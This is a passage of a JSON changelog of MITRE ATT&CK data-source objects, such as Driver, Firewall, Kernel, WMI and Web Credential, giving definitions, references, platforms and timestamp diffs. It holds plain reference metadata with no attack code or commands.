{\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.700Z\", \"old_value\": \"2025-04-18T15:12:29.888Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0027", + "external_id": "DS0027" + }, + { + "source_name": "IOKit Fundamentals", + "description": "Apple. (2014, April 9). What Is the I/O Kit?. Retrieved September 24, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html" + }, + { + "source_name": "Windows Getting Started Drivers", + "description": "Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:53.761Z", + "name": "Driver", + "description": "A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:53.761Z\", \"old_value\": \"2025-04-16T20:39:09.930Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0018", + "external_id": "DS0018" + }, + { + "source_name": "AWS Sec Groups VPC", + "description": "Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:58.457Z", + "name": "Firewall", + "description": "A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "Identity Provider", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:58.457Z\", \"old_value\": \"2025-04-16T20:39:12.372Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:07.251Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:07.251Z\", \"old_value\": \"2025-04-18T15:12:49.401Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0036", + "external_id": "DS0036" + }, + { + "source_name": "Amazon IAM Groups", + "description": "Amazon. (n.d.). IAM user groups. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:55.737Z", + "name": "Group", + "description": "A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "SaaS", + "Windows", + "Office Suite", + "Identity Provider" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:55.737Z\", \"old_value\": \"2025-04-16T20:39:10.972Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0007", + "external_id": "DS0007" + }, + { + "source_name": "Microsoft Image", + "description": "Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource" + }, + { + "source_name": "Amazon AMI", + "description": "Amazon. (n.d.). Amazon Machine Images (AMI). Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:56.103Z", + "name": "Image", + "description": "A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:56.103Z\", \"old_value\": \"2025-04-16T20:39:11.122Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0035", + "external_id": "DS0035" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:51.440Z", + "name": "Internet Scan", + "description": "Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:51.440Z\", \"old_value\": \"2025-04-16T20:39:08.675Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0008", + "external_id": "DS0008" + }, + { + "source_name": "STIG Audit Kernel Modules", + "description": "Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.", + "url": "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383" + }, + { + "source_name": "Init Man Page", + "description": "Kerrisk, M. (2021, March 22). INIT_MODULE(2). Retrieved September 28, 2021.", + "url": "https://man7.org/linux/man-pages/man2/init_module.2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:57.731Z", + "name": "Kernel", + "description": "A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:57.731Z\", \"old_value\": \"2025-04-16T20:39:12.054Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.151Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.151Z\", \"old_value\": \"2025-04-18T15:12:13.134Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0023", + "external_id": "DS0023" + }, + { + "source_name": "Microsoft Named Pipes", + "description": "Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:53.223Z", + "name": "Named Pipe", + "description": "Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:53.223Z\", \"old_value\": \"2025-04-16T20:39:09.639Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.613Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.613Z\", \"old_value\": \"2025-04-18T15:09:58.319Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--3bef4799-906c-409c-ac00-3fb7a1e352e6", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0021", + "external_id": "DS0021" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:58.095Z", + "name": "Persona", + "description": "A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:58.095Z\", \"old_value\": \"2025-04-16T20:39:12.210Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--06bb1e05-533b-4de3-ae87-9b99910465cf", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0014", + "external_id": "DS0014" + }, + { + "source_name": "Kube Kubectl", + "description": "kubernetes. (n.d.). kubectl. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/kubectl/kubectl/" + }, + { + "source_name": "Kube Pod", + "description": "kubenetes. (n.d.). Pod v1 core. Retrieved October 13, 2021.", + "url": "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:58.983Z", + "name": "Pod", + "description": "A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:58.983Z\", \"old_value\": \"2025-04-16T20:39:12.521Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.238Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:05.238Z\", \"old_value\": \"2025-04-18T15:11:33.637Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:04.346Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:04.346Z\", \"old_value\": \"2025-04-18T15:10:47.833Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--6d7de3b7-283d-48f9-909c-60d123d9d768", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0020", + "external_id": "DS0020" + }, + { + "source_name": "Microsoft Snapshot", + "description": "Microsoft. (2021, September 16). Create a snapshot of a virtual hard disk. Retrieved October 13, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk" + }, + { + "source_name": "Amazon Snapshots", + "description": "Amazon. (n.d.). Amazon EBS snapshots. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:55.198Z", + "name": "Snapshot", + "description": "A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:55.198Z\", \"old_value\": \"2025-04-16T20:39:10.827Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--2cd6cc81-d86e-4595-a4f0-43f5519f14e6", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0005", + "external_id": "DS0005" + }, + { + "source_name": "Microsoft WMI System Classes", + "description": "Microsoft. (2018, May 31). WMI System Classes. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes" + }, + { + "source_name": "Microsoft WMI Architecture", + "description": "Microsoft. (2018, May 31). WMI Architecture. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:56.995Z", + "name": "WMI", + "description": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:56.995Z\", \"old_value\": \"2025-04-16T20:39:11.750Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--1e26f222-e27e-4bfa-830c-fa4b4f18b5e4", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0006", + "external_id": "DS0006" + }, + { + "source_name": "Medium Authentication Tokens", + "description": "Hsu, S. (2018, June 30). Session vs Token Based Authentication. Retrieved September 29, 2021.", + "url": "https://medium.com/@sherryhsu/session-vs-token-based-authentication-11a6c5ac45e4" + }, + { + "source_name": "Auth0 Access Tokens", + "description": "Auth0. (n.d.). Access Tokens. Retrieved September 29, 2021.", + "url": "https://auth0.com/docs/tokens/access-tokens" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:51.076Z", + "name": "Web Credential", + "description": "Credential material, such as session cookies or tokens, used to authenticate to web applications and services(Citation: Medium Authentication Tokens)(Citation: Auth0 Access Tokens)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "Identity Provider" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:51.076Z\", \"old_value\": \"2025-04-16T20:39:08.491Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0024", + "external_id": "DS0024" + }, + { + "source_name": "Microsoft Registry", + "description": "Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:05.783Z", + "name": 